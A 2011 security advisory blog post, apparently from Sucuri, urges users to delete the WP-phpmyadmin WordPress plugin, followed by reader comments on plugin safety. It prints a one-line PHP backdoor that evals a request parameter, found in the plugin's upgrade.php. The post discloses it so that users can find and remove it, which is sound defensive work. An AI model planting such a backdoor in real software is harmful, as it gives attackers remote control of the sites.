WP-phpmyadmin WordPress plugin – Delete it now

June 22, 2011David Dede

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.

If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Pingback: Von bösen Plugins und Spekulationen - Dann, Spekulationen, Mailadresse, WPtouch, Plugins, Aber - Die Datenreisenden()
Guest

WP Greet Box was also removed recently (probably for security reasons).
Pingback: WP-phpMyAdmin Plugin Hacked — Backdoor Vulnerability()
eric_cmi

What about the plugin Portable phpMyAdmin?
- Otto
  
  That plugin fixed the security problem: http://wordpress.org/extend/plugins/portable-phpmyadmin/changelog/
  - Andres Armeda
    
    Hi Otto, are you referring to Portable phpMyAdmin?
    
    The link you posted is redirecting to the plugin directory home page.
    
    Thanks.
    - Ayush Gupta
      
      Looks like plugin is back in action
- Andres Armeda
  
  We haven’t seen any security issues with that plugin Eric.
  
  The thing to consider is that you’re giving direct access in the
  WordPress dashboard to modify the database. This is a huge risk when you
  consider users that aren’t experienced with this type of interaction.
  
  If it needs to be used in a production environment, it is highly
  recommended that the proper access control be applied, and that
  processes be implemented around the use of the functionality.
  
  Hope this helps!
Pingback: WordPress Security Alert – WP-PhpMyAdmin()
Pingback: Security pros recommend against using the WP-phpmyadmin plugin | WPCandy()
Pingback: How to Use WordPress Plugins for Marketing | - Just the place to learn anything - The Article Bin()
Pingback: WP-phpmyadmin WordPress tillägg()
Web marketer

Hi,

Thanks for the info.

I’ve had a nightmare over the last 24 hours as ALL my sites were compromised and malicious code injected into the index.php files.

I’ve now removed the phpmyadmin plugin (which had the corrupted code in the update file as you say) and all seems to be ok for the moment. Fingers crossed it stays that way.

My question is…

Could the hacker access and inject malicious code on all my sites (all on the same shared hosting server) even if the plugin was only installed on one of the domains?

I ask because I want to know if this is the only plugin causing me woe or whether there are more I need to act on.

Thanks again
D
Pingback: Daily Tip: WP-phpmyadmin Plugin Poses a Huge Security Risk | WordPress News at WPMU.org()
Ed

Hey guys,

First off i completely agree that having a phpadmin plugin in the WP Dashboard is a huge risk on so many different levels. 😉 With that said, have you looked at or tested the WordPress Adminer plugin? The coding looks really solid and minus some base64 encoded images it looks really solid. Thanks.
Pingback: WpPhpMyAdmin WordPress plugin Can Expose your Site to Hacker()
Pingback: The Case of the Hacked WordPress Website – SYS | Wordpress Theme Plugin Tutorial Tips Download()
Pingback: WP-phpmyadmin gammalt tillägg till WordPress - En annan plats på nätet()
Pingback: The Case of the Hacked WordPress Website – SYS | WP NEWS()
Pingback: How to Avoid Getting Hacked - Ramblings of a SurferNerd()
David

Hi, I am very pleased with the plugin.. does exactly what i wanted. Thanks for share!
Pingback: WordPress.org repository will not show plugins older than 2 years()
Ayush Gupta

Now this plugin is removed from WordPress because it was having malicious code
Pingback: WordPressのテーマが改竄され不正なコードが挿入されたことの報告 | knowledge tree – ナレッジツリー()
Pingback: WP Engine Support Garage » Disallowed Plugins()
Pingback: Don’t get hacked at ThriveYourTribe.com()
Jrfalcon5

my website was hacked after installing this and it said “hacked by nolov3” and my website was gone.
Pingback: A Little Tale About Website Cross-Contamination | Sucuri Blog()
Guest

Doesn’t seem to be such a reliable claim. PhPMyAdmin is nowhere a low-quality malware, but instead a widely-used and quite nice tool. This article here seems to be indicating that the authors of that software deliberately wanted to do some backdoor things. This I highly doubt. http://www.phpmyadmin.net/home_page/security/ Hope more experienced people would provide some more knowledge on it.
Timothy

Did you read the article? It is talking about WordPress plugin that packaged phpMyAdmin, and was insecure. They aren’t talking about the actual phpMyAdmin tool as being insecure, just the plugin.
André Páscoa

Parabéns pelo post. Eatava a procura de um artigo assim.